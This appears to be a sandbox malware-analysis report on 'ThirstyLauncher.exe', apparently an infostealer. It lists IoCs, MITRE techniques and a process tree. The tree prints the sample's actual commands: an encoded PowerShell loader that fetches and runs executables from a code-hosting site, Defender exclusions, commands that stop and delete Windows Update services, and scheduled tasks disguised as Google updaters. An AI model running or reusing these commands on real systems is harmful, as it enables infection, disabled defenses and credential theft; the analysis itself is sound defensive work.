00310dcf38e02d26825864a4e969ba7be64ffe87c840f9708265d5e51c00bd20

Analysis

max time kernel
50s
max time network
150s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
27/11/2022, 02:08

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ThirstyLauncher.exe
Size

162KB
MD5

dd7f2b45c9537ee59a5f03e5b01a5132
SHA1

da5e55a244b5b0131593dc4a4943223d4e7c290f
SHA256

00310dcf38e02d26825864a4e969ba7be64ffe87c840f9708265d5e51c00bd20
SHA512

90985c14ddb2adc072943a663382ab95f3a8df7b26b7bd17d587a66eb8a3a7a3f5ef9892716b60445cd7f7a8e004cfe84f9e3f0257ea782938343ae8779b2341
SSDEEP

3072:YenRWXDQKT/BeL0XMiFX/SFKE7iHdUX5F3OqbCpb:sDf/BCsMGP+KE7KSHRb

Score

10^/10

evasion spyware stealer

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs

description	pid	Process	procid_target
PID 4976 created 8	4976	LicCheck.exe	26
PID 4976 created 8	4976	LicCheck.exe	26
PID 4976 created 8	4976	LicCheck.exe	26
PID 4976 created 8	4976	LicCheck.exe	26
PID 4512 created 8	4512	2au8qdErXb.exe	26
PID 4512 created 8	4512	2au8qdErXb.exe	26
PID 4512 created 8	4512	2au8qdErXb.exe	26

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	4808	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	LicCheck.exe
File created	C:\Windows\System32\drivers\etc\hosts	2au8qdErXb.exe

Executes dropped EXE 6 IoCs

pid	Process
4836	SysHost.exe
4388	LMSCheck.exe
4976	LicCheck.exe
4284	SA07cEnYTb.exe
3668	svcupdater.exe
4512	2au8qdErXb.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updatert.exe	LicCheck.exe
File created	C:\Program Files\Google\Chrome\updater.exe	2au8qdErXb.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4772	sc.exe
192	sc.exe
3136	sc.exe
1360	sc.exe
3768	sc.exe
1372	sc.exe
1968	sc.exe
1216	sc.exe
1640	sc.exe
3088	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4176	schtasks.exe

Suspicious behavior: EnumeratesProcesses 40 IoCs

pid	Process
4808	powershell.exe
4808	powershell.exe
4808	powershell.exe
3532	powershell.exe
3532	powershell.exe
3532	powershell.exe
4976	LicCheck.exe
4976	LicCheck.exe
4568	powershell.exe
4568	powershell.exe
4568	powershell.exe
4976	LicCheck.exe
4976	LicCheck.exe
4976	LicCheck.exe
4976	LicCheck.exe
4976	LicCheck.exe
4976	LicCheck.exe
1156	powershell.exe
1156	powershell.exe
1156	powershell.exe
3896	powershell.exe
3896	powershell.exe
3896	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
4512	2au8qdErXb.exe
4512	2au8qdErXb.exe
1212	powershell.exe
1212	powershell.exe
1212	powershell.exe
4512	2au8qdErXb.exe
4512	2au8qdErXb.exe
4512	2au8qdErXb.exe
4512	2au8qdErXb.exe
4512	2au8qdErXb.exe
4512	2au8qdErXb.exe
1612	powershell.exe
1612	powershell.exe
1612	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2412	ThirstyLauncher.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	3532	powershell.exe
Token: SeIncreaseQuotaPrivilege	4808	powershell.exe
Token: SeSecurityPrivilege	4808	powershell.exe
Token: SeTakeOwnershipPrivilege	4808	powershell.exe
Token: SeLoadDriverPrivilege	4808	powershell.exe
Token: SeSystemProfilePrivilege	4808	powershell.exe
Token: SeSystemtimePrivilege	4808	powershell.exe
Token: SeProfSingleProcessPrivilege	4808	powershell.exe
Token: SeIncBasePriorityPrivilege	4808	powershell.exe
Token: SeCreatePagefilePrivilege	4808	powershell.exe
Token: SeBackupPrivilege	4808	powershell.exe
Token: SeRestorePrivilege	4808	powershell.exe
Token: SeShutdownPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeSystemEnvironmentPrivilege	4808	powershell.exe
Token: SeRemoteShutdownPrivilege	4808	powershell.exe
Token: SeUndockPrivilege	4808	powershell.exe
Token: SeManageVolumePrivilege	4808	powershell.exe
Token: 33	4808	powershell.exe
Token: 34	4808	powershell.exe
Token: 35	4808	powershell.exe
Token: 36	4808	powershell.exe
Token: SeDebugPrivilege	4836	SysHost.exe
Token: SeIncreaseQuotaPrivilege	5084	wmic.exe
Token: SeSecurityPrivilege	5084	wmic.exe
Token: SeTakeOwnershipPrivilege	5084	wmic.exe
Token: SeLoadDriverPrivilege	5084	wmic.exe
Token: SeSystemProfilePrivilege	5084	wmic.exe
Token: SeSystemtimePrivilege	5084	wmic.exe
Token: SeProfSingleProcessPrivilege	5084	wmic.exe
Token: SeIncBasePriorityPrivilege	5084	wmic.exe
Token: SeCreatePagefilePrivilege	5084	wmic.exe
Token: SeBackupPrivilege	5084	wmic.exe
Token: SeRestorePrivilege	5084	wmic.exe
Token: SeShutdownPrivilege	5084	wmic.exe
Token: SeDebugPrivilege	5084	wmic.exe
Token: SeSystemEnvironmentPrivilege	5084	wmic.exe
Token: SeRemoteShutdownPrivilege	5084	wmic.exe
Token: SeUndockPrivilege	5084	wmic.exe
Token: SeManageVolumePrivilege	5084	wmic.exe
Token: 33	5084	wmic.exe
Token: 34	5084	wmic.exe
Token: 35	5084	wmic.exe
Token: 36	5084	wmic.exe
Token: SeIncreaseQuotaPrivilege	5084	wmic.exe
Token: SeSecurityPrivilege	5084	wmic.exe
Token: SeTakeOwnershipPrivilege	5084	wmic.exe
Token: SeLoadDriverPrivilege	5084	wmic.exe
Token: SeSystemProfilePrivilege	5084	wmic.exe
Token: SeSystemtimePrivilege	5084	wmic.exe
Token: SeProfSingleProcessPrivilege	5084	wmic.exe
Token: SeIncBasePriorityPrivilege	5084	wmic.exe
Token: SeCreatePagefilePrivilege	5084	wmic.exe
Token: SeBackupPrivilege	5084	wmic.exe
Token: SeRestorePrivilege	5084	wmic.exe
Token: SeShutdownPrivilege	5084	wmic.exe
Token: SeDebugPrivilege	5084	wmic.exe
Token: SeSystemEnvironmentPrivilege	5084	wmic.exe
Token: SeRemoteShutdownPrivilege	5084	wmic.exe
Token: SeUndockPrivilege	5084	wmic.exe
Token: SeManageVolumePrivilege	5084	wmic.exe
Token: 33	5084	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2412 wrote to memory of 4808	2412	ThirstyLauncher.exe	67
PID 2412 wrote to memory of 4808	2412	ThirstyLauncher.exe	67
PID 4808 wrote to memory of 3532	4808	powershell.exe	69
PID 4808 wrote to memory of 3532	4808	powershell.exe	69
PID 4808 wrote to memory of 4836	4808	powershell.exe	72
PID 4808 wrote to memory of 4836	4808	powershell.exe	72
PID 4836 wrote to memory of 4072	4836	SysHost.exe	73
PID 4836 wrote to memory of 4072	4836	SysHost.exe	73
PID 4072 wrote to memory of 4176	4072	cmd.exe	75
PID 4072 wrote to memory of 4176	4072	cmd.exe	75
PID 4808 wrote to memory of 4388	4808	powershell.exe	76
PID 4808 wrote to memory of 4388	4808	powershell.exe	76
PID 4808 wrote to memory of 4976	4808	powershell.exe	77
PID 4808 wrote to memory of 4976	4808	powershell.exe	77
PID 4388 wrote to memory of 5084	4388	LMSCheck.exe	78
PID 4388 wrote to memory of 5084	4388	LMSCheck.exe	78
PID 4388 wrote to memory of 4080	4388	LMSCheck.exe	80
PID 4388 wrote to memory of 4080	4388	LMSCheck.exe	80
PID 4080 wrote to memory of 2560	4080	cmd.exe	82
PID 4080 wrote to memory of 2560	4080	cmd.exe	82
PID 4388 wrote to memory of 4648	4388	LMSCheck.exe	83
PID 4388 wrote to memory of 4648	4388	LMSCheck.exe	83
PID 4648 wrote to memory of 4540	4648	cmd.exe	85
PID 4648 wrote to memory of 4540	4648	cmd.exe	85
PID 924 wrote to memory of 4772	924	cmd.exe	94
PID 924 wrote to memory of 4772	924	cmd.exe	94
PID 1796 wrote to memory of 3372	1796	cmd.exe	95
PID 1796 wrote to memory of 3372	1796	cmd.exe	95
PID 924 wrote to memory of 192	924	cmd.exe	96
PID 924 wrote to memory of 192	924	cmd.exe	96
PID 1796 wrote to memory of 2656	1796	cmd.exe	97
PID 1796 wrote to memory of 2656	1796	cmd.exe	97
PID 924 wrote to memory of 3136	924	cmd.exe	98
PID 924 wrote to memory of 3136	924	cmd.exe	98
PID 1796 wrote to memory of 4676	1796	cmd.exe	99
PID 1796 wrote to memory of 4676	1796	cmd.exe	99
PID 924 wrote to memory of 1968	924	cmd.exe	100
PID 924 wrote to memory of 1968	924	cmd.exe	100
PID 1796 wrote to memory of 668	1796	cmd.exe	101
PID 1796 wrote to memory of 668	1796	cmd.exe	101
PID 924 wrote to memory of 1216	924	cmd.exe	102
PID 924 wrote to memory of 1216	924	cmd.exe	102
PID 924 wrote to memory of 2228	924	cmd.exe	103
PID 924 wrote to memory of 2228	924	cmd.exe	103
PID 924 wrote to memory of 3900	924	cmd.exe	104
PID 924 wrote to memory of 3900	924	cmd.exe	104
PID 924 wrote to memory of 2072	924	cmd.exe	105
PID 924 wrote to memory of 2072	924	cmd.exe	105
PID 4388 wrote to memory of 3896	4388	LMSCheck.exe	106
PID 4388 wrote to memory of 3896	4388	LMSCheck.exe	106
PID 924 wrote to memory of 2504	924	cmd.exe	108
PID 924 wrote to memory of 2504	924	cmd.exe	108
PID 924 wrote to memory of 3916	924	cmd.exe	109
PID 924 wrote to memory of 3916	924	cmd.exe	109
PID 3896 wrote to memory of 4284	3896	powershell.exe	110
PID 3896 wrote to memory of 4284	3896	powershell.exe	110
PID 4388 wrote to memory of 2032	4388	LMSCheck.exe	112
PID 4388 wrote to memory of 2032	4388	LMSCheck.exe	112
PID 2032 wrote to memory of 4512	2032	powershell.exe	114
PID 2032 wrote to memory of 4512	2032	powershell.exe	114
PID 4936 wrote to memory of 1640	4936	cmd.exe	123
PID 4936 wrote to memory of 1640	4936	cmd.exe	123
PID 4932 wrote to memory of 4316	4932	cmd.exe	124
PID 4932 wrote to memory of 4316	4932	cmd.exe	124

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:8
- C:\Users\Admin\AppData\Local\Temp\ThirstyLauncher.exe
  "C:\Users\Admin\AppData\Local\Temp\ThirstyLauncher.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdgBjACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGQAcwBsACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAC8AVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHkAdwBrACMAPgA7ACIAOwA8ACMAegB3AHcAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwByAGgAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBkAGIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBrAGQAaQAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGUAYQBzAHkAZgBmAGYAZgBmAGYALwBhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZAAvAHIAYQB3AC8AOQA2AGUAYQBjADAAMgBhAGMAYwA0AGIAZAA4ADMAOQAwADcAMgBjAGUAZABkADUAMAA4AGQANgAzADAAYwA2AGUAMgAzAGUAOQBkADMANAAvAGIAcgB2ADIALgBlAHgAZQAnACwAIAA8ACMAbABkAGUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAGIAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB1AHAAbgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBIAG8AcwB0AC4AZQB4AGUAJwApACkAPAAjAHEAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBlAGEAcwB5AGYAZgBmAGYAZgBmAC8AYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQAYQBzAGQALwByAGEAdwAvADkANgBlAGEAYwAwADIAYQBjAGMANABiAGQAOAAzADkAMAA3ADIAYwBlAGQAZAA1ADAAOABkADYAMwAwAGMANgBlADIAMwBlADkAZAAzADQALwBsAG0ALgBlAHgAZQAnACwAIAA8ACMAcQBjAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGsAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAGIAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAE0AUwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAdQBmAHIAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGUAYQBzAHkAZgBmAGYAZgBmAGYALwBhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZABhAHMAZAAvAHIAYQB3AC8AOQA2AGUAYQBjADAAMgBhAGMAYwA0AGIAZAA4ADMAOQAwADcAMgBjAGUAZABkADUAMAA4AGQANgAzADAAYwA2AGUAMgAzAGUAOQBkADMANAAvAGwAZQBtAG8AbgAuAGUAeABlACcALAAgADwAIwBpAG0AawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHoAdAB4ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG0AdABmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEMAaABlAGMAawAuAGUAeABlACcAKQApADwAIwBtAHgAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAG0AdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBiAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMASABvAHMAdAAuAGUAeABlACcAKQA8ACMAYgB1AGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYQBhAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAcQBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwATQBTAEMAaABlAGMAawAuAGUAeABlACcAKQA8ACMAZgB4AGkAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwB3AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHIAbABxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEMAaABlAGMAawAuAGUAeABlACcAKQA8ACMAeQBkAG0AIwA+AA=="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#dsl#>[System.Windows.Forms.MessageBox]::Show('No VM/VPS allowed!','','OK','Error')<#ywk#>;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3532
  - - C:\Users\Admin\AppData\Roaming\SysHost.exe
      "C:\Users\Admin\AppData\Roaming\SysHost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4836
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C schtasks /create /tn \XgKocxNybk /tr "C:\Users\Admin\AppData\Roaming\XgKocxNybk\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4072
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn \XgKocxNybk /tr "C:\Users\Admin\AppData\Roaming\XgKocxNybk\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
        6⤵
        Creates scheduled task(s)
        
        PID:4176
  - - C:\Users\Admin\AppData\Roaming\LMSCheck.exe
      "C:\Users\Admin\AppData\Roaming\LMSCheck.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4388
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5084
    - - C:\Windows\system32\cmd.exe
        
        cmd /C "wmic path win32_VideoController get name"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4080
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        
        PID:2560
    - - C:\Windows\system32\cmd.exe
        
        cmd /C "wmic cpu get name"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4648
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get name
        6⤵
        
        PID:4540
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "" "start-process C:\Users\Admin\AppData\Local\Temp\SA07cEnYTb.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3896
      - C:\Users\Admin\AppData\Local\Temp\SA07cEnYTb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SA07cEnYTb.exe"
        6⤵
        Executes dropped EXE
        
        PID:4284
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "" "start-process C:\Users\Admin\AppData\Local\Temp\2au8qdErXb.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2032
      - C:\Users\Admin\AppData\Local\Temp\2au8qdErXb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2au8qdErXb.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lueuy#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCTT' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCTT' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineCTT" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1612
  - - C:\Users\Admin\AppData\Local\Temp\LicCheck.exe
      "C:\Users\Admin\AppData\Local\Temp\LicCheck.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in Drivers directory
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      PID:4976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4568
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:924
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4772
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:192
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3136
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1968
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1216
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:2228
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:3900
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:2072
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:2504
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3916
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1796
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:3372
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:2656
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4676
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ssfng#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTask' /tr '''C:\Program Files\Google\Chrome\updatert.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatert.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTask' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updatert.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1212
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4936
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1640
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3088
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1360
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3768
